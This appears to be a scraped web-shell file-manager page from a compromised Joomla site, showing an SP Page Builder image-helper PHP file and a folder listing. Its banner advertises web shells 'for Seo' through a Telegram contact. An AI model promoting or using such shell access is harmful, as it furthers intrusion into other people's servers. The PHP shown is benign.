__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2022 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
use Joomla\CMS\Image\Image;
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');
class SppagebuilderHelperImage extends Image
{
public function createThumbs($thumbSizes, $creationMethod = self::SCALE_INSIDE, $thumbsFolder = null)
{
// Make sure the resource handle is valid.
if (!$this->isLoaded())
{
throw new LogicException('No valid image was loaded.');
}
// Process thumbs
$thumbsCreated = array();
// Generate sizes
$newThumbSizes = array();
$thumbNames = array();
foreach ($thumbSizes as $key => $value) {
$newThumbSizes[] = $value;
$thumbNames[] = $key;
}
if ($thumbs = $this->generateThumbs($newThumbSizes, $creationMethod))
{
// Parent image properties
$imgProperties = self::getImageFileProperties($this->getPath());
foreach ($thumbs as $key=>$thumb)
{
// Get thumb properties
$thumbWidth = $thumb->getWidth();
$thumbHeight = $thumb->getHeight();
// Generate thumb name
$filename = pathinfo($this->getPath(), PATHINFO_FILENAME);
$fileExtension = pathinfo($this->getPath(), PATHINFO_EXTENSION);
if($thumbsFolder) {
$thumbsFolder = dirname($this->getPath()) . '/' . $thumbsFolder;
$thumbFileName = $filename . '.' . $fileExtension;
} else {
$thumbsFolder = dirname($this->getPath());
$thumbFileName = $filename . '_'. $thumbNames[$key] .'.' . $fileExtension;
}
// Save thumb file to disk
$thumbFileName = $thumbsFolder . '/' . $thumbFileName;
if ($thumb->toFile($thumbFileName, $imgProperties->type))
{
// Return Image object with thumb path to ease further manipulation
$thumb->path = $thumbFileName;
$thumbsCreated[] = $thumb;
}
}
}
return $thumbsCreated;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| tweet | Folder | 0775 |
|
|
| addon-helper.php | File | 8.17 KB | 0664 |
|
| ajax.php | File | 5.89 KB | 0664 |
|
| articles.php | File | 12.24 KB | 0664 |
|
| assets-css-parser.php | File | 1.97 KB | 0664 |
|
| auth-helper.php | File | 3.77 KB | 0664 |
|
| autoload.php | File | 1.48 KB | 0664 |
|
| css-parser.php | File | 9.7 KB | 0664 |
|
| helper.php | File | 2.48 KB | 0664 |
|
| image-bak.php | File | 1.92 KB | 0664 |
|
| image.php | File | 1.92 KB | 0664 |
|
| integration-helper.php | File | 1.04 KB | 0664 |
|
| k2.php | File | 8.17 KB | 0664 |
|
| route.php | File | 2.2 KB | 0664 |
|